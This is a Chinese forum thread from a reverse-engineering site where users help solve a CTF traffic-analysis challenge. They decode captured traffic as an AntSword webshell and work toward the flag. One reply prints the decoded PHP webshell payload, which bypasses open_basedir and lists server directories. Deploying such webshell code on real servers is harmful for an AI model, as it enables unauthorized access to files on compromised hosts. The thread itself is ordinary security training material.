吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 699|回复: 22
收起左侧

[求助] 一个ctf流量分析题

[复制链接]
GoogleHacking 发表于 2024-1-5 16:37
本帖最后由 GoogleHacking 于 2024-1-5 19:40 编辑

题目链接:https://wwxp.lanzouw.com/iZpFV1k4vr7g




这个流量分析题最后追到的流量是这样,但是导出对象没有找到php和txt,全是加密的,求一个解题思路,这个加密流量看着像一句话木马,套了base64,但是不知道怎么解,最终的flag是啥,求大佬指导



Kali-linux-2024-01-05-16-30-52.png

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

aake 发表于 2024-1-5 19:56
GoogleHacking 发表于 2024-1-5 19:51
https://qsnctf.com/challenges#%E ... 88%86%E6%9E%902-558

攻击流量分析2

qsnctf{The_ant_sword_is_really_easy_to_use}

免费评分

参与人数 1吾爱币 +1 收起 理由
GoogleHacking + 1 我很赞同!

查看全部评分

aake 发表于 2024-1-5 23:31
GoogleHacking 发表于 2024-1-5 23:27
你这个图里面,流为啥是4,这个流是干嘛用的。我看最多只能到5,这个流作用是啥?怎么根据流量的特征来判 ...

流是为了方便看http包,无法根据流量特征来直接找到数字大小,具体看题型如果是这种马的流量;那么进去先筛选http的包,然后一个个看流(主要看数据包内容),根据内容来进行判断是否流量包含文件、压缩包、还是像本题一样考察的是蚁剑的流量加密编码等

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
GoogleHacking + 1 + 1 热心回复!

查看全部评分

yimingqpa 发表于 2024-1-5 17:36
URL编解码一下。

qsnctf=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.7b1e4cec";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "8518"."6016";echo @asenc($output);echo "fc"."118";}ob_start();try{$D=base64_decode(substr($_POST["u0bbb0e2037d9d"],2));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="        ".$T."        ".@filesize($P)."        ".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();&
aake 发表于 2024-1-5 18:15
蚁剑的马 ,注意后面的u0bbb0e2037d9d=WoL3Zhci93d3cvaHRtbC9xc25jdGYudHh0,删掉Wo,把这个拿去base64,d3cvaHRtbC9xc25jdGYudHh0 > /var/www/html/qsnctf.txt
aake 发表于 2024-1-5 18:17
/var/www/html/qsnctf.txt 内容 8c9f7dc394a11abeb069d
zeror 发表于 2024-1-5 19:06
一脚本而已,第3个TCP流
2.jpg
1.jpg
 楼主| GoogleHacking 发表于 2024-1-5 19:40
zeror 发表于 2024-1-5 19:06
一脚本而已,第3个TCP流

所以最终的flag是啥
 楼主| GoogleHacking 发表于 2024-1-5 19:41
yimingqpa 发表于 2024-1-5 17:36
URL编解码一下。

qsnctf=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_b ...

这个我解过了,但是没啥用,找不到flag
 楼主| GoogleHacking 发表于 2024-1-5 19:42
aake 发表于 2024-1-5 18:17
/var/www/html/qsnctf.txt 内容 8c9f7dc394a11abeb069d

所以最终的flag是啥
aake 发表于 2024-1-5 19:44
GoogleHacking 发表于 2024-1-5 19:42
所以最终的flag是啥

拼接下,看flag提交规则,flag{8c9f7dc394a11abeb069d} 或qcnctf{8c9f7dc394a11abeb069d}
 楼主| GoogleHacking 发表于 2024-1-5 19:47
aake 发表于 2024-1-5 19:44
拼接下,看flag提交规则,flag{8c9f7dc394a11abeb069d} 或qcnctf{8c9f7dc394a11abeb069d}

试了这个qcnctf{8c9f7dc394a11abeb069d},不对
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-28 08:01

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表